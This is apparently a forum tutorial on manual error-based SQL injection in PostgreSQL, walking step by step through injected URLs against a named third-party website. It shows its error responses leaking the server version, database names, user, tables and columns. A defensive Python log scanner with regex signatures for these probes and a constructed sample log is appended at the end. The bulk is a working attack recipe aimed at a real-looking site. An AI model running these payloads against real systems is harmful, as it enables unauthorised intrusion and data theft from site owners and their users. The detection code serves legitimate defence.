2:11 AM MANUAL POSTGRESQL ERROR BASED SQL INJECTION TUTORIAL
Traditional relational database management systems (DBMSs) support a data model consisting of a collection of named relations, each containing attributes of a specific type. In current commercial systems, possible types include floating point numbers, integers, character strings, money, and dates.

Let's start to play with PostgreSQL. We have a website that is vulnerable to error-based SQL injection.

1st step: find the vulnerability.

Code: http://www.creatop.com.cn/index.cfm?MenuID=80'

ERROR: syntax error at or near "''"

This means the website can be injected. Remember that errors vary; you won't get the same error every time.

2nd step: count the columns.

Code: http://www.creatop.com.cn/index.cfm?MenuID=80 order by 1--

This returns a valid page.

Code: http://www.creatop.com.cn/index.cfm?MenuID=80 order by 2--

Error Executing Database Query. ERROR: ORDER BY position 2 is not in select list

That error shows that there is one column. Let's try a UNION SELECT query:

Code: http://www.creatop.com.cn/index.cfm?MenuID=80 and 1=2 UNION SELECT 1--

Error Executing Database Query. ERROR: UNION types character varying and integer cannot be matched

Seems like the UNION SELECT query is not working!!! Let's try error-based PostgreSQL SQLi.

3rd step: fingerprint the server.

Code: http://www.creatop.com.cn/index.cfm?MenuID=80 and 1=cast(version() as int)--

ERROR: invalid input syntax for integer: "PostgreSQL 8.4.5 on i486-pc-linux-gnu, compiled by GCC gcc-4.4.real (Ubuntu 4.4.3-4ubuntu5) 4.4.3, 32-bit"

As we can see, we got the version of the PostgreSQL server in the form of an error. Let's move on and find the database name.

Code: http://www.creatop.com.cn/index.cfm?MenuID=80 and 1=cast((select datname from pg_database limit 1 offset 0) as int)--

Error Executing Database Query. ERROR: invalid input syntax for integer: "scoutsqld"

scoutsqld is the first database; we can get the others by changing the offset :)

Code: http://www.creatop.com.cn/index.cfm?MenuID=80 and 1=cast((select datname from pg_database limit 1 offset 1) as int)--

Error Executing Database Query. ERROR: invalid input syntax for integer: "template0"

template0 is the 2nd database, so you can keep increasing the offset until you get the error. Let's find out the user:

Code: http://www.creatop.com.cn/index.cfm?MenuID=80 and 1=cast((select user from pg_database limit 1 offset 0) as int)--

Error Executing Database Query. ERROR: invalid input syntax for integer: "postgres"

postgres is the user :) Let's find the tables :>

4th step: list the tables.

Code: http://www.creatop.com.cn/index.cfm?MenuID=80 and 1=cast((select table_name from information_schema.tables limit 1 offset 0) as int)--

Error Executing Database Query. ERROR: invalid input syntax for integer: "pg_type"

pg_type is the first table; we can get the others by changing the offset :)

5th step: now we have to find the columns of our specific table!!! E.g. our table is pg_type. For that we have to use char conversion (the same CHR() trick as in Oracle):

pg_type = CHR(112) || CHR(103) || CHR(95) || CHR(116) || CHR(121) || CHR(112) || CHR(101)

So our query is:

Code: http://www.creatop.com.cn/index.cfm?MenuID=80 and 1=cast((select column_name from information_schema.columns where table_name= CHR(112) || CHR(103) || CHR(95) || CHR(116) || CHR(121) || CHR(112) || CHR(101) limit 1 offset 0) as int)--

Error Executing Database Query. ERROR: invalid input syntax for integer: "typname"

Further columns can be found using the offset.

Last step: now we have to extract data from our column.

Code: http://www.creatop.com.cn/index.cfm?MenuID=80 and 1=cast((select typname from pg_type limit 1 offset 0) as int)--

Error Executing Database Query. ERROR: invalid input syntax for integer: "bool"
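Seen from the defending side, every step above leaves a distinctive request in the web server's access log: a stray quote, ORDER BY probes, and cast(... as int) wrapped around catalog queries, usually answered with a 5xx because the database error is echoed to the client. The following is an added example, not code from the original tutorial: a small log scanner that URL-decodes each query string, tags the probe kinds from this sequence, and flags a client that shows several of them. The log lines, IPs and paths are constructed placeholders.

```python
import re
from urllib.parse import unquote_plus, urlsplit

# Signature names mirror the probing sequence in the tutorial: quote probe,
# ORDER BY column count, UNION attempt, cast()-as-int oracle, catalog reads,
# and CHR() concatenation used to spell out a table name.
SIGNATURES = {
    "quote_probe": re.compile(r"'\s*$"),
    "orderby_probe": re.compile(r"\border\s+by\s+\d+", re.I),
    "union_probe": re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I),
    "cast_as_int": re.compile(r"\bcast\s*\(.*\bas\s+int\s*\)", re.I),
    "catalog_read": re.compile(r"\b(?:pg_database|pg_type|information_schema\.\w+)\b", re.I),
    "chr_concat": re.compile(r"\bchr\s*\(\s*\d+\s*\)\s*\|\|", re.I),
}

# Combined-format access log: we only need client IP, request target and status.
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "[A-Z]+ (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

def classify_target(target):
    """Return the set of signature names found in the URL-decoded query string."""
    decoded = unquote_plus(urlsplit(target).query)
    return {name for name, rx in SIGNATURES.items() if rx.search(decoded)}

def scan_log(lines):
    """Return [(ip, status, [signatures])] for requests matching at least one signature."""
    hits = []
    for m in filter(None, map(LOG_LINE.match, lines)):
        matched = classify_target(m.group("target"))
        if matched:
            hits.append((m.group("ip"), int(m.group("status")), sorted(matched)))
    return hits

def suspicious_sources(hits, min_kinds=2):
    """A client showing several distinct probe kinds is the stepwise enumeration
    pattern (quote -> order by -> cast), not a stray false positive."""
    kinds = {}
    for ip, _status, matched in hits:
        kinds.setdefault(ip, set()).update(matched)
    return {ip: sorted(k) for ip, k in kinds.items() if len(k) >= min_kinds}

# Constructed sample log (not real traffic); addresses are documentation ranges.
SAMPLE_LOG = [
    '203.0.113.7 - - [25/Nov/2011:02:11:00 +0000] "GET /index.cfm?MenuID=80 HTTP/1.1" 200 5120',
    '203.0.113.7 - - [25/Nov/2011:02:11:05 +0000] "GET /index.cfm?MenuID=80%27 HTTP/1.1" 500 812',
    '203.0.113.7 - - [25/Nov/2011:02:11:09 +0000] "GET /index.cfm?MenuID=80%20order%20by%202-- HTTP/1.1" 500 790',
    '203.0.113.7 - - [25/Nov/2011:02:11:31 +0000] "GET /index.cfm?MenuID=80%20and%201%3Dcast((select%20datname%20from%20pg_database%20limit%201%20offset%200)%20as%20int)-- HTTP/1.1" 500 870',
    '203.0.113.7 - - [25/Nov/2011:02:11:44 +0000] "GET /index.cfm?MenuID=80%20and%201%3Dcast((select%20column_name%20from%20information_schema.columns%20where%20table_name%3DCHR(112)%20%7C%7C%20CHR(103)%20limit%201)%20as%20int)-- HTTP/1.1" 500 880',
    '198.51.100.4 - - [25/Nov/2011:02:12:00 +0000] "GET /index.cfm?MenuID=81 HTTP/1.1" 200 5100',
]
```

The 5xx status on each flagged request is the second signal worth alerting on: it means the raw database error is reaching the client, which is what makes the cast() technique work at all.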